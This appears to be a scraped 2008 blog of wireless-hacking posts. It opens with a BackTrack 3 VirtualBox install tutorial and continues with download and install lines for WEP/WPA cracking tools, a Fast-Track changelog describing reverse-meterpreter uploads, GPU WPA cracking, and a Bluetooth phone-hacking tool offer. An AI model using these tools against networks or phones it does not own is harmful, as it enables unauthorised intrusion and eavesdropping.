Leave the "Extended Features", "Enable ACPI" checkbox checked.
Click the "Extended Features", "Enable IO APIC" checkbox to make it checked.
If you have a newer CPU then click the "Extended Features", "Enable VT-x/AMD-V" checkbox to make it checked.
Click the "Extended Features", "Enable PAE/NX" checkbox to make it checked.
Choose "Bidirectional" for the "Shared Clipboard" setting.
Choose "PIIX4 for the "IDE Controller Type" (PIIX3 does not implement an SMBus or I2C bus).
Change the "Snapshot Folder" to the same location as your Virtual Boot Drive (C:\Backtrack3).
11.): In the "General", "Settings", "Description" tab you can type "Backtrack 3".

12.): In the "General", "Settings", "Other" tab you should leave the "Remember Mounted Media" checkbox checked.

13.): In the "Hard Disks" tab you should click the "Enable SATA Controller" checkbox.
You could add a second drive as per the instructions in step 7. call it something
like: "C:\Backtrack3\Backtrack3_HD2.vdi". I disabled the SATA checkbox and it seemed
like VirtualBox ran slightly quicker, more testing required. I Ended up leaving it on.
14.): You have already configured your CD/DVD-ROM settings and can skip the "Floppy" setting (unless you want a floppy drive).

15.): In the "Audio" tab you should click the "Enable Audio" checkbox.
Choose "Windows DirectSound" for the "Host Audio Driver".
Choose "ICH AC97" for the "Audio Controller", (if you don't have audio in Backtrack 3 then
try the older "SoundBlaster 16" card). Audio works fine OOTB one my system.
16.): In the "Network", "Adapter 1" tab you should do the following:
Leave the "Enable Network Adapter" checkbox checked.
Choose "Intel PRO/1000 T Server (82543GC)" for the "Adapter Type" setting.
Choose "Host Interface" for the "Attached to" setting. Later you will (attempt) to 'Bridge' your 'Wireless Network Card'.
Click the "Generate" button and change the last 8 digits of the "MAC Address" to an easy to remember (080012345678) value.

Next to the "Host Interfaces" box click on the "Add" button and name the interface VBH 1 (one, not "i" or "L").
When the Windows "Hardware Installation" panel appears for the "VirtualBox TAP Adapter" click on "Continue Anyway".

After a minute you will get a new Icon in your tray with a 'red X' over it. This is
OK, we will Bridge this later. If you have more than one 'Wireless Network Card' then
you can repeat step 16 (with different MAC and IF names).
17.): In the "Serial Ports", "Port 1" tab click on "Enable Serial Port", choose "Port Number",
"COM1" and "Port Mode", "Host Device". This would allow you to add GPS later and causes
the Linux OS to notice that you do have serial ports (and install a driver).

18.): In the "USB" tab click the "Enable USB Controller" and the "Enable USB 2.0 (EHCI) Controller" checkboxs.

Click your Windows XP "Start" button, click on "Run" and 'Open' "cmd" (to shell to DOS), then type this:

cd "C:\Program Files\Sun\xVM VirtualBox"
VBoxManage list usbhost

Look at the list of USB devices. You can add things like BlueTooth or a USB drive / USB Memory Card.

Use the "Add" button to create a new "Filter" and the "Edit" button to fill in the details,
if you get a detail wrong you will filter out the device and be unable to use it so if you
are uncertain then only fill in the "Name" and "Serial Number".
19.): You can setup "Shared Folders" and "Remote Display" if you want, I did not.

20.): Prior to leaving the "Settings" panel please ensure that there is no "red warning message"
in the bottom panel and "Invalid settings detected". If there is then go back to the
suggested entry and see if it is correct. Sometimes a false warning is given and you can
simply click, then un-click on something, change the pane to a different one and the message
will go away without actually having changed anything. New software can have bugs or you may
have made an incompatable choice.

Hit "OK" and in the "Sun xVM VirtualBox" window, on the "Details" tab, all the black
writing (on the left) will turn blue once you have everthing correctly set.

21.): In the "Sun xVM VirtualBox" window click on "File", "Preferences" and in the "VirtualBox - Settings",
"Input" panel you might want to change the "Host Key" before you continue. Remember what it is
set to and click "OK". The "Host Key" allows you to swap between Backtrack 3 and Windows.

22.): Now click the green start arrow and Backtrack 3 should start to boot in the Virtual Machine.

23.): When the Virtual Machine starts you will get a reminder about your "Host Key", read the
message and then:

Click the "OK" button and QUICKLY get ready to hit the "Maximize button (so Backtrack 3
will know your true screen size). You might get a couple of popups about your screen being
in 24 bit mode (when you are actually in 32 bit mode), click "OK" to ignore these messages.

24.): You will get a "Found New Hardware" Wizard popup as Backtrack 3 boots. Grab the top and
move it out of the way so you can see Backtrack 3's boot screen and ensure that everything
is working properly. Remember, before you can use the mouse to grab the "Found New Hardware"
Wizard popup you MUST hit your "Host Key".

25.): When you get to Backtrack 3's login prompt you can go back to dealing with the "Found New Hardware" Wizard popup.

The first pane of the popup says "Can Windows connect to Windows Update to search for
software?", choose "No, not this time" and click "Next". The second pane of the popup says
"What do you want the Wizard to do?", choose "Install from a list or a specific location
(Advanced)" and click "Next". On the next pane choose the 'Radio Button' labeled "Don't
search. I will choose the driver to install. Click next. If you need to locate the driver
it might be in this directory: C:\Program Files\Sun\xVM VirtualBox\drivers\USB\device\ .
Click "Finish" to close the Wizard.

26.): If you return to Backtrack 3 (using ALT-TAB) you might see a black screen, click on it.
Now you might get a message about capturing the mouseclick, choose capture and move your
mouse. The screensaver will unblank.

27.): Now login to Backtrack three as user "root" with password "toor". Type "reboot" and
Backtrack 3 will eject the virtual CD/DVD-ROM and halt with a Fatal Error. Go to
VirtualBox's "File" menu and choose "Reset", when the capture box pops up click "OK"
(quickly) and hit the "Down Arrow" to defeat the 4 second countdown.

28.): These Lilo boot options are available under VirtualBox (without mods, with 64MB display memory):

Code:
BT3 Graphics mode (Compiz) - Boots but xconfig / startx reboots the X Server.
BT3 Graphics mode (Compiz Nvidia) - Boots but xconfig / startx reboots the X Server.
BT3 Graphics mode (KDE) - Keeps popping up messages about 16-bit mode and rebooting the X Server.
BT3 Graphics mode (Flux) - Keeps popping up messages about 16-bit mode and rebooting the X Server.
BT3 Graphics mode (VESA KDE) - Boots and starts the X session (in 16 bit mode).
...If you use the first setting and then run xconf you can run startx and see the errors
when the X Server terminates. If you use 120MB (120!) of memory for the "Video Memory Size"
then you only get 16 bit display depth (and few errors). Refer to Section 9 (above) in
this Tutorial for info about VirtualBox Video Modes.

After only a little testing (and messing around) I found that "BT3 Graphics mode (VESA KDE)"
was the only true graphics mode that works. You can use the "Compviz" modes if you don't
want to use X11 and the GUI.

write by Nokii@forums.remote-exploit.org

Installing Backtrack 3 under VirtualBox - Part 2

2008-11-24T06:29:00.000-08:00

Installing Backtrack 3 under VirtualBox - Part 3

2008-11-24T06:28:00.002-08:00

29.): You can install software on Backtrack 3 and save 'Snapshots' to save your place or
follow another tutorial about making any changes 'sticky' to preserve your work between
boots. Go back to your "Settings" and change the "Radio Button" to finish using the
Backtrack 3 installation .ISO image on your HD.

30.): See these threads for info on copying the CD/DVD-ROM .ISO image to VirtualBox's virtual
HD drives so you can make changes and update your software without resorting to Snapshots
to make things sticky.

How to install backtrack 3 final from the shell
hxxp://forums.remote-exploit.org/showthread.php?t=14751

Install BT3 live onto flash, save changes, with compiz
hxxp://forums.remote-exploit.org/showthread.php?t=14812

TUTORIAL: live install with changes, swap and data partitions
hxxp://forums.remote-exploit.org/showthread.php?t=7844

How to install BT3Final onto external USB HDD - Solve the Kernel Panic
hxxp://forums.remote-exploit.org/showthread.php?t=16593

I mainly used the fourth Tutorial (and modified the commands from the above suggestions
to suit a Virtual HD with Backtrack 3, instead of a USB Drive with BT2). I then went into
VirtualBox's "Settings", "Details", "CD/DVD-ROM" settings. I unchecked "Mount CD/DVD-ROM"
to unmounted the "bt3final_usb.iso" file and made the first virtual HD the boot drive,
upon rebooting all changes were sticky.

Use "fdisk /dev/hda" to make your first partition (boot) 1.5GB, your swap 1GB and use the
rest for the root (using an 8GB HD). You can type "p" in fdisk and it should print a table
as shown below (use "m" as needed, and don't forget to "w"rite). You may prefer to use cfdisk
instead of fdisk as it is easier to use and may have fewer bugs.

Code:
bt ~ # fdisk -l /dev/hda

Disk /dev/hda: 8589 MB, 8589934592 bytes
16 heads, 63 sectors/track, 16644 cylinders
Units = cylinders of 1008 * 512 = 516096 bytes

Device Boot Start End Blocks Id System
/dev/hda1 * 1 2906 1464592+ 83 Linux
/dev/hda2 2907 4844 976752 82 Linux swap
/dev/hda3 4845 16644 5947200 83 LinuxYou can use QTParted to format your HDs but I recommend using fdisk to partition them.

You will now type the following to get setup (thanks to goon123 in thread 16593):

Code:
bt ~ # mkswap /dev/hda2
bt ~ # swapon /dev/hda2

bt ~ # mkdir /mnt/backtrack
bt ~ # mount /dev/hda3 /mnt/backtrack/
bt ~ # mkdir /mnt/backtrack/boot
bt ~ # mount /dev/hda1 /mnt/backtrack/boot/
bt ~ # cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/
bt ~ # mkdir /mnt/backtrack/{mnt,proc,sys,tmp}
bt ~ # mount --bind /dev/ /mnt/backtrack/dev/
bt ~ # mount -t proc proc /mnt/backtrack/proc/
bt ~ # cp /boot/vmlinuz /mnt/backtrack/boot/

bt ~ # chroot /mnt/backtrack/ /bin/bash
bt ~ # nano /etc/lilo.confYou want the following in your lilo.conf file. Set your vga correctly, here are some
suggested values: "vga=ask" (gives a menu), "vga=normal" (default), or use one of these:

Code:
640x480 800x600 1024x768 1280x1024
32K 784 787 790 793
64K 785 788 791 794
16M 786 789 792 795Code:
# Start LILO global section
lba32
boot /dev/hda
prompt
timeout = 60
change-rules
reset
compact
vga = 792
# End LILO global section
# Linux bootable partition config begins
image = /boot/vmlinuz
root = /dev/hda3
label = Backtrack3
append = ”rootdelay=10”
# Linux bootable partition config ends
The "BT3 Graphics mode (VESA KDE)" command line is:

Code:
/boot/vmlinuz vga=0x317 initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw autoexec=kdm
Save that and then execute lilo (I like to use the very verbose flag)

bt ~ # lilo -v -v

Exit your chroot enviorment and your Konsole shell.

bt ~ # exit
bt ~ # exit

If you ever wish to edit your lilo.conf after the above create and copy procedure you
can return to where you were by using these commands instead of the above procedure.
First use the CD/DVD-ROM boot disk to start Backtrack 3 and then enter these commands
to adjust your mounts:

Code:
bt ~ # umount /dev/hda1
bt ~ # umount /dev/hda3
bt ~ # swapoff -a
bt ~ # mkdir /mnt/backtrack
bt ~ # mount /dev/hda3 /mnt/backtrack
bt ~ # mount /dev/hda1 /mnt/backtrack/boot
bt ~ # mount --bind /dev/ /mnt/backtrack/dev/
bt ~ # mount -t proc proc /mnt/backtrack/proc/
bt ~ # chroot /mnt/backtrack/ /bin/bash
bt ~ # nano /etc/lilo.conf
bt ~ # lilo -v
Use the "Start" button "Log Out", "Turn Off Computer" to exit Backtrack3.

In VirtualBox's "Settings", "Details", "CD/DVD-ROM" pane you can click on the
"Mount CD/DVD-ROM Drive" to disengage the "bt3final_usb.iso" from the CD/DVD-ROM
drive or better still go to "Settings", "General", "Advanced", "Boot Order" and
click on "Hard Disk" and the "Up Arrow" (to the right) to make the HD boot first.

Click "OK" and now click the green "Start" right-arrow to restart Backtrack 3 (from the VHD).
Ensure that Backtrack 3 is working and use the "Start" button to "Log Out","

31.): In some Wireless Network Drivers you are able to use Bridging, and some you can not.
If you have a very new computer then, when configuring VirtualBox, you are able to set
on the "General", "Settings", "Advanced" tab the "Extended Features", "Enable VT-x/AMD-V"
checkbox. With this set you can use VT-d to directly access your Wireless Network card.

My computer is new, but not that new so I had to use Bridging, here is what I did:

In Windows open the "Network Connections", locate and click on both your "Wireless
Network Adapter" and your "VirtualBox TAP Adapter", now right-click and choose Bridge.

32.): When you have everything correctly installed on your HD you can add the Virtual Tools.

In the VirtualBox menu "Devices" there is an entry called "Install Guest Additions...".

To install these tools go to the VirtualBox Toolbar (bottom right of the window) and
right-click on the CD/DVD-ROM, choose "Unmount CD/DVD-ROM" to unmount the Backtrack 3
installation CD/DVD-ROM.

Now select "Install Guest Additions..." and it will appear on your Backtrack 3 Desktop
as a CD Icon. The file is called VBOXADDITIONS_2.0.2_36486. In order to mount this file
you will need to open Konsole and create a new directory called /mnt/hdc first.

When you have it mounted in your Konsole type this and then reboot:

Code:
cd /mnt/hdc
./VBoxLinuxAdditions-x86.run
echo 98vboxadd-xclient > ~/.xinitrc
reboot
33.): Start Backtrack 3 in VirtualBox and type "ifconfig", notice that you have "eth1" and "lo".
If you can use VT-d then you might have your Wireless Networking already working but for
the rest of use that must use Bridging you can enable Promiscuous mode on the Bridge:

Code:
ifconfig eth0 up
ip link set dev eth0 promisc onNow type "ifconfig" and you will see "PROMISC" working for eth0 (your Wireless Bridge).
Notice your HWaddr, it should be the MAC of your "Wireless Network Adapter".

When following tips given you will use eth0 instead of wifi0 or ath0 and likely will
need to tweak the tips a bit to get everything working to the extent it is possible.

You will find that some programs only work if they can detect a "Wireless Network
Adapter". Wireshark works but you might want to filter out "STP" packets. You can
also use any of Backtrack 3's tools on capture files saved from OmniPeek (you can use
Wireshark to read OmniPeek ".pkt" files and save them to ".cap" format.

write by Nokii@forums.remote-exploit.org

Tool Spoonwpa Wpa Key

2008-11-24T06:28:00.001-08:00

http://shamanvirtuel.googlepages.com/SWPA.lzm

lzm2dir SWPA.lzm /

or copy it to module folder

that adds a link into kmenu in wifi/cracking

or you can launch it typing spoonwpa in a shell

demo: http://neovortex.kodings.googlepages.com/spoonwpavid.htm

Spoonwep2

2008-11-24T06:27:00.002-08:00

spoonwep adds an automatic victim sniffer, presenting results of airodump in an intuitive manner

http://neovortex.kodings.googlepages.com/spoonwep2.lzm

demo : http://neovortex.kodings.googlepages.com/spoonwep2vid.htm

INSTALLATION/UPDATE :

LIVE INSTALL : copy the spoonwep2.lzm to /BT3/modules onto your usb or into your iso

REAL & LIVE+CHANGES INSTALL : open a shell and type this :
lzm2dir spoonwep2.lzm /

you still can launch it from the command line typing : spoonwep

demo: old spoonwep http://neovortex.kodings.googlepages.com/spoonwepvid.htm

Fast-Track version 3.4

2008-11-24T06:27:00.001-08:00

* Small change, I dynamically generate the version numbers now in menu and command line mode, before
you may have noticed it said Version 3 and never changed with different versions. Now its showing
the correct version numbers every update.
* Changed the changelog.txt and credits.txt to CREDITS and CHANGELOG. Also modified credits to be
up to date.
* Fixed a bug where going to About in menu mode would cause Fast-Track to crash.
* Added error handling if Fast-Track Web GUI if the port was already in use.
* Removed the Shikata Ga Nai encoding from Fast-Track's SQLPWANGE, it was causing issues
on some systems with corruptable executabls.
* Added better cleanup in SQLPwnage to remove H2B files as soon as the conversion to binary
is completed.
* Added a "browse" button to the wordlist specification in sql bruter and in binary to hex generator.
Before you had to manually specify the wordlist or file to convert, now you just hit the browse button
and navigate to it.
* Changed the timeout with no internet connection for identifying an IP address to 2 seconds instead of
the default of 8 on SQLPwnage.
* Changed the directories where SQLPwnage does its conversions from binary to hex to the appdata folder.
My plan is to make all information go into the appdata folder and noowhere else. A lot easier for cleanup.
* Created a "version" directory in bin that handles what version number Fast-Track is on for the menu mode
and command line mode.
* Added some cool stuff to the SQL Bruter, once a system gets popped with the "sa" account, Fast-Track will
now allow you to specify what type of payload you want. For example, you can use the normal command shell
but we also incorporated the 64kb debug bypass attack that uploads a metasploit reverse vnc or reverse
meterpreter to the system without having to upload anything. Pretty slick feature that I haven't seen in
any SQL bruters before.

AiroWizard 1.0 Beta revision 240

2008-11-24T06:26:00.001-08:00

The WEP key recovering utility for Windows

AiroWizard 1.0 Beta revision 240

Changes :

-adapter list tab: "Check vendor" button no longer invokes the messagebox with the vendor name.The vendor's name is now under the "vendor" label.As Mister_X suggested, i transfered the mac codes text files to a database, so that clicking on the particular adapter in adapter list no longer hogs the CPU (as much...). http://airowizard.webs.com/adapters.gif

-monitor mode tab: Here's something for Zermelo.If airserv-ng is not running, there's no way to run any other part of the suite dependable of airserv-ng. http://airowizard.webs.com/monitor.gif

-wep crack and recovery tab: Here's something for Zermelo, again.Added the ivsools support, as well as the dictionary switch. http://airowizard.webs.com/aircrack.gif

-advanced tab: As Mister_X suggested, i've added the "Usage help" button, which invokes new form with the redirected output from a program (without any switches) , in order to get the usage help. http://airowizard.webs.com/usagehelp.gif

-new tab : Added the "Log viewer" tab. http://airowizard.webs.com/logviewer.gif

-new tab : Since AiroWizard is now using the database instead of text files, i've introduced a new tab called "Adapter vendor list" with a data grid displaying the adapters macs and vendor names.This can be used for fast and convenient insertion of random vendor MACs, either for MAC spoofing purposes, or the BSSID filtering. http://airowizard.webs.com/vendors.gif

To upgrade to a newer revision, just uninstall the older one and install the new revision.

Old versions:

AiroWizard 1.0 Beta revision 230

-added debug logging, as well as "-a" filter option for initial airodump-ng scan.

AiroWizard 1.0 Beta revision 220

-bugfix : exception when clicking on "search" button of the "Vendor List" form: "Could not fina a part of the path 'C:\NET1\bin\MAC codes.txt"

-minor GUI changes

AiroWizard 1.0 Beta revision 200

Changes :

-added MAC filtering options for the initial Airodump-ng scan

-added Wzcook support

AiroWizard 1.0 Beta

-initial release

aircrack-ptw in Windows using AirPcap Tx and Cain

2008-11-24T06:25:00.000-08:00

WEP cracked, using BackTrack 3 on my EeePc 900

2008-11-24T06:24:00.000-08:00

Giga Password Generator

2008-11-24T06:23:00.001-08:00

"Giga password Generat0r". It has 23 differents modes for generating almost everything, including hexadecimal and personnal charset. The script is using the crunch generator, which makes it really fast to generate. The script is still in dev, I will add more modes later so that it will cover all the possibilities, including special chars and blank spaces.

The script is still in french yet, I will translate it when I will find some time.

You can download the script here: Giga Password Generat0r v 1.2 (latest version with 23 generating modes)

Cracking WPA with GPU support

2008-11-24T06:22:00.001-08:00

Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project's goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit's implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol's security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world's most used security-protocols.

AiroWizard Setup-Beta 1-rev 250 exe

Wich cheap usb card to buy ?

2008-11-24T06:21:00.001-08:00

For USB, only the following chipsets are recommended:

RT73
RTL8187L

Devices that use them are:
D-Link DWL-G122 C1
Edimax EW-7318USg
Hawking HWUG1
Alfa AWUS036H

There are likely many others that use these chipsets.

Wich cheap usb card to buy ?

2008-11-24T06:21:00.000-08:00

For USB, only the following chipsets are recommended:

RT73
RTL8187L

Devices that use them are:
D-Link DWL-G122 C1
Edimax EW-7318USg
Hawking HWUG1
Alfa AWUS036H

There are likely many others that use these chipsets.

Intel Wireless Wi-Fi 5100 Card injection OK

2008-11-24T06:20:00.000-08:00

Intel Wireless Wi-Fi 5100 Card injection test is working OK with kernel linux-2.6.27-rc7.tar.bz2,
patchet with the latest iwlwifi drivers patch, wich enables packet injection for iwlagn.

In order to get injection working on Intel 5100 card download the latest linux-2.6.27-rc7.tar.bz2 kernel and patch the iwlwifi driver with the diffs from the latest kernel iwlwifi driver changes from Stefanik Gábor.

How to catch hackers on your wireless network

2008-11-24T06:19:00.003-08:00

There are lots of tools around to help people carry out ARP-related exploits and if a malicious, Wi-Fi enabled neighbour decided to find out more about your network, this could be an effective way to do it.

The good news is that there are some defences out there. The bad? They can be costly and don’t always deliver the protection you might expect.
Arpdefender is a good example. It’s a solid-state security appliance that you simply connect to your network, then leave to look out for ARP poisoning attacks. It would be excellent if not for the fact that it costs almost £300 and, even if it does detect an attack, will do little more than make an entry in your system logs more
via thewifihack.com

How to catch hackers on your wireless network

2008-11-24T06:19:00.002-08:00

Arpwatch

2008-11-24T06:19:00.001-08:00

Arpwatch is a tool that monitors ethernet activity and keeps a database of ethernet/ip address pairings. It also reports certain changes via email. Arpwatch uses libpcap, a system-independent interface for user-level packet capture. Before building tcpdump, you must first retrieve and build libpcap, also from LBL, in: ftp://ftp.ee.lbl.gov/libpcap-*.tar.Z.

Wirelessly Keyboard Hack

2008-11-24T06:17:00.000-08:00

Wired keyboards emit electromagnetic waves, because they contain eletronic components. These eletromagnetic radiation could reveal sensitive information such as keystrokes. Although Kuhn already tagged keyboards as risky, we did not find any experiment or evidence proving or refuting the practical feasibility to remotely eavesdrop keystrokes, especially on modern keyboards.

To determine if wired keyboards generate compromising emanations, we measured the electromagnetic radiations emitted when keys are pressed. To analyze compromising radiations, we generally use a receiver tuned on a specific frequency. However, this method may not be optimal: the signal does not contain the maximal entropy since a significant amount of information is lost.

Our approach was to acquire the signal directly from the antenna and to work on the whole captured electromagnetic spectrum.

We found 4 different ways (including the Kuhn attack) to fully or partially recover keystrokes from wired keyboards at a distance up to 20 meters, even through walls. We tested 11 different wired keyboard models bought between 2001 and 2008 (PS/2, USB and laptop). They are all vulnerable to at least one of our 4 attacks.

We conclude that wired computer keyboards sold in the stores generate compromising emanations (mainly because of the cost pressures in the design). Hence they are not safe to transmit sensitive information. No doubt that our attacks can be significantly improved, since we used relatively inexpensive equipments.

Fujitsu Siemens Bluetooth V2.0 - BC4

2008-11-24T06:16:00.000-08:00

Fujitsu Siemens Bluetooth V2.0 - BC4

Download FCC Report for Fujitsu Siemens Bluetooth V2.0 - BC4

Super Bluetooth Hack 1.8

2008-11-24T06:15:00.001-08:00

Free Download Super Bluetooth Hack 1.8

Compatible With:
Alcatel: One Touch 557, One Touch 557a, One Touch 735, One Touch 756, One Touch C550, One Touch C552, One Touch C552a, One Touch C750, One Touch S853
Asus: P525
Audiovox: SMT 5600
BenQ: A520, C30, EF51, P50
BenQ-Siemens: CL71, E61, S81, S88
BlackBerry: 6220, 6230, 6280, 6720, 7100, 7100i, 7130, 7130e, 7210, 7230, 7250, 7280, 7290, 7510, 7520, 7730, 8100, 8130, 8300, 8310, 8320, 8700, 8703e, 8707, 8800, 8820, 8830
CECT: A1000
Cingular: Cingular 2125, Cingular BlackJack
Dopod: Dopod 515, Dopod 557w, Dopod 565, Dopod 575, Dopod 585, Dopod 586w, Dopod 595, Dopod C720W
HP: iPAQ 510 Mobile Messenger
HTC: HTC MTeoR, HTC S310, HTC S620, HTC S650, HTC S710, P3400, P3450
Huawei: U526, U626
i-mate: i-mate Smartphone2, i-mate SP Jas, i-mate SP3, i-mate SP3i, i-mate SP5, i-mate SP5m, i-mate SPL
I-mobile: 510
Lenovo: V800
LG: B2000, B2050, B2070, B2100, B2150, C1100, C1150, C2000, C2500, C2600, C3100, C3300, C3400, CG225, CU400, CU500, F2400, G1600, G1610, G4015, G7100, KE770, KE800, KE820, KE970, KG110, KG195, KG200, KG220, KG225, KG240, KG245, KG290, KG300, KG320, KG800, LG KE500, LG-KE600, LG550, LX550, LX570, M4410, MG100a, MG105, MG220, MX510, P7200, S5200, T5100, TU500, U8210, U8290, U8330, U8500, VX9400, VX9900
LG Electronics: LG-B2060
Mitac: Mio 8390, Mio 8860, Mio 8870
Motorola: A1200, A760, A768, A780, A835, C155, C168, C257, C261, C290, C350, C350M, C380, C385, C390, C450, C550, C650, C975, E1000, E1070, E365, E380, E398, E398B, E398i, E550, E680, E680i, E770, E770-Vodafone, E790, E815, i830, i850, i930, K1, KZRK K1, L2, L6, L6i, L7-Vodafone, L71, Motorola Q, Motorola Q Plus, MPX220, PEBL U6, Razr V3, RAZR V3a, RAZR V3m, Razr V3x, RAZR V3xx, RAZR V3xxv, RAZR V6, RAZR2 V8, RAZR2 V9, RAZR2 V9m, RIZR Z10, RIZR Z8, ROKR E1, ROKR E2, ROKR E6, SLVR L7, SLVR L7e, SLVR L7i, SLVR L9, T720, V1050, V1075, V171, V177, V180, V186, V188, V190, V191, V195, V197, V220, V235, V300, V303, V360, V360-Vodafone, V365, V3c, V3i, V3m, V3r, V3t, V3v, V3x-Vodafone, V400, V500, V505, V525, V525M, V535, V545, V547, V550, V551, V555, V557, V600, V600i, V620, V635, V690, V80, V975, V980, V980M, W220, W315, W375, W490, W510, Z3
NEC: N600
Nokia: 2355, 2610, 2626, 2630, 2650, 2760, 2855i, 2865, 2865i, 3100, 3105, 3110c, 3120, 3125, 3152, 3155, 3155i, 3200, 3220, 3230, 3250, 3300, 3410, 3500, 3510, 3510i, 3530, 3586i, 3587, 3595, 3600, 3620, 3650, 3660, 5070, 5100, 5140, 5140i, 5200, 5300, 5310 XpressMusic, 5500, 6010, 6015, 6020, 6021, 6030, 6060, 6060v, 6061, 6070, 6080, 6085, 6086, 6100, 6101, 6102, 6102i, 6103, 6108, 6111, 6120c, 6125, 6126, 6131, 6133, 6151, 6155, 6165, 6165i, 6170, 6200, 6220, 6225, 6230, 6230i, 6233, 6234, 6235, 6235i, 6255, 6255i, 6260, 6265, 6265i, 6267, 6270, 6275i, 6280, 6288, 6300, 6310i, 6500c, 6500s, 6555, 6585, 6600, 6610, 6610i, 6620, 6630, 6650, 6651, 6670, 6680, 6681, 6682, 6708, 6800, 6810, 6820, 6822, 7200, 7210, 7250, 7250i, 7260, 7270, 7360, 7370, 7373, 7390, 7500, 7600, 7610, 7650, 7710, 8600 Luna, 8800, 8800 Sirocco, 8910i, 9210, 9290, 9300, 9500, E50, E51, E60, E61, E61i, E62, E65, E70, E90, N-Gage, N-Gage QD, N70, N70-1, N71, N72, N73, N75, N77, N80-1, N90, N91, N92, N93, N93i, N95, N95 8GB
O2: Ice
Orange: SPV, SPV C100, SPV C500, SPV C550, SPV C600, SPV C700, SPV e100, SPV E200
Panasonic: A210, SC3, VS2, VS3, VS6, X200P, X400, X400P, X500, X70
Pantech: PG-1400, PG-1410, PG-C300
Philips: 568, 588, 755, 756, 766, 768, 960, S890, S900
Qtek: 8100, 8500
QTEK: QTEK 7070, QTEK 8010, QTEK 8020, QTEK 8080, QTEK 8100, QTEK 8300, QTEK 8310, QTEK 8600
RoverPC: M1
Sagem: MY 302X, MY 301X, MY 400V, MY 400X, MY 401C, MY 401X, MY 401Z, MY 501C, MY 501X, MY 600v, MY 600x, MY 700X, MY C4-2, MY C5-2, MY C5-2 Vodafone, MY V-55, MY V-56, MY V-65, MY V-75, MY W-7, MY X-4, MY X-5-2T, MY X-6, MY X-7, MY X-8, MY X5-2, MY X5-2M, MY X6-2, MY Z-5, my411X, myX5-2v, Sagem myS-7
Samsung: A717, i300, i320, i320N, SCH A870, SGH A701, SGH A707, SGH C100, SGH C100G, SGH C130, SGH C140, SGH C160, SGH C170, SGH C200, SGH C207, SGH C207L, SGH C210, SGH C230, SGH C260, SGH C300, SGH C400, SGH C406, SGH C417, SGH D407, SGH D410, SGH D500, SGH D500C, SGH D500E, SGH D510, SGH D520, SGH D600, SGH D600E, SGH D720, SGH D800, SGH D807, SGH D820, SGH D830, SGH D836, SGH D840, SGH D900, SGH D900i, SGH E200, SGH E250, SGH E300, SGH E310, SGH E310C, SGH E315, SGH E316, SGH E330, SGH E330N, SGH E340, SGH E340E, SGH E350, SGH E350E, SGH E360, SGH E370, SGH E376, SGH E390, SGH E420, SGH E490, SGH E500, SGH E530, SGH E568, SGH E570, SGH E600, SGH E620, SGH E630, SGH E630C, SGH E690, SGH E700, SGH E710, SGH E715, SGH E720, SGH E728, SGH E730, SGH E736, SGH E760, SGH E780, SGH E800, SGH E808, SGH E810, SGH E820, SGH E830, SGH E840, SGH E870, SGH E878, SGH E890, SGH E898, SGH E900, SGH G600, SGH i300, SGH I320, SGH I607, SGH J600, SGH L760, SGH M600, SGH P200, SGH P300, SGH P310, SGH P400, SGH P510, SGH P777, SGH P850, SGH P900, SGH P906, SGH P910, SGH P920, SGH S300, SGH S300M, SGH S500, SGH T209, SGH T219, SGH T309, SGH T319, SGH T329, SGH T509, SGH T509S, SGH T519, SGH T609, SGH T619, SGH T629, SGH T729, SGH T809, SGH U600, SGH U700, SGH V200, SGH X100, SGH X100A, SGH X105, SGH X120, SGH X140, SGH X160, SGH X200, SGH X210, SGH X300, SGH X430, SGH X450, SGH X460, SGH X480, SGH X486, SGH X490, SGH X495, SGH X500, SGH X506, SGH X507, SGH X510, SGH X520, SGH X530, SGH X540, SGH X600, SGH X608, SGH X610, SGH X620, SGH X620C, SGH X630, SGH X636, SGH X640, SGH X640C, SGH X648, SGH X650, SGH X660, SGH X670, SGH X680, SGH X686, SGH X700, SGH X820, SGH X830, SGH Z107, SGH Z140, SGH Z170, SGH Z230, SGH Z240, SGH Z300, SGH Z370, SGH Z400, SGH Z400V, SGH Z500, SGH Z510, SGH Z530, SGH Z540, SGH Z560, SGH Z630, SGH Z720, SGH ZV10, SGH ZV40, SGH ZV50, SGH-i607, SPH A580, SPH A640, SPH A660, SPH A680, SPH A740, SPH A900, SPH A900P, SPH A920, SPH A940, SPH A960, SPH M500, SPH M510, SPH M610, SPH M620, Z130, Z150
Sanyo: S750, SCP-6600
Sendo: X
Sharp: 770SH, GX-L15, GX10, GX10i, GX15, GX17, GX20, GX22, GX25, GX29, GX30, GX30i, GXT15, TM100, TM150
Siemens: A31, A60, A65, A75, AL21, AP75, AX72, AX75, AX76, C55, C60, C62, C65, C65-Vodafone, C66, C72, C75, CF62, CF75, CF76, CX65, CX70, CX75, EF81, M50, M55, M56, M65, M75, MC60, ME75, MT50, S55, S57, S65, S75, SK65, SL42, SL45, SL55, SL65, SL75, ST60, SX1
Sony-Ericsson: D750, D750i, F500i, G700, G900, J200i, J210i, J220i, J230i, J300a, J300i, K200i, K300, K300a, K300i, K310, K310a, K310i, K320i, K500i, K508, K508c, K508i, K510a, K510i, K530i, K550i, K600, K600i, K608i, K610, K610i, K618i, K700, K700c, K700i, K750, K750i, K790a, K790i, K800i, K800iv, K810i, K850i, M600i, P1i, P800, P900, P910, P910a, P910i, P990i, S500i, S700, S700i, S710a, T226, T230, T250i, T290a, T290i, T610, T616, T630, T637, T650i, T68, V600, V600i, V630i, W200a, W200i, W300, W300i, W550c, W550i, W580i, W600c, W600i, W610i, W660i, W700i, W710i, W800c, W800i, W810i, W810iv, W830i, W850i, W850iv, W880i, W900i, W910i, W950i, W960, Z1010, Z200, Z300i, Z310i, Z310iv, Z500, Z500a, Z520a, Z520i, Z530i, Z550a, Z550i, Z558i, Z600, Z610i, Z710i, Z800
T-Mobile: MDA Dash, MDA Mail, SDA, SDA (US name), SDA II, SDA Music
Tatung: M1
VK Mobile: VK4000
Vodafone: v1210, v1240, VDA II, VDA IV

On Getjar.com

2008-11-24T06:15:00.000-08:00

